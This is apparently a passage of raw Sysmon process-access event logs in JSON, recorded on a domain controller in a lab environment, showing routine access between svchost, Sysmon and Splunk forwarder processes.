{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2733,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.952\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.952","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2734,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.952\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.952","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2735,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.952\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.952","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2736,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.952\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.952","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2737,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.952\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.952","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2738,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.952\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.952","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2739,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.952\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.952","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2740,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:31.952\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FB7-5F25-0000-001051DF0400}\r\nTargetProcessId: 4240\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:54:31.952","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FB7-5F25-0000-001051DF0400}","TargetProcessId":"4240","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:54:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:54:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2741,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:54:32.077\r\nSourceProcessGUID: {41C8662E-1FB7-5F25-0000-001051DF0400}\r\nSourceProcessId: 4240\r\nSourceThreadId: 4260\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program 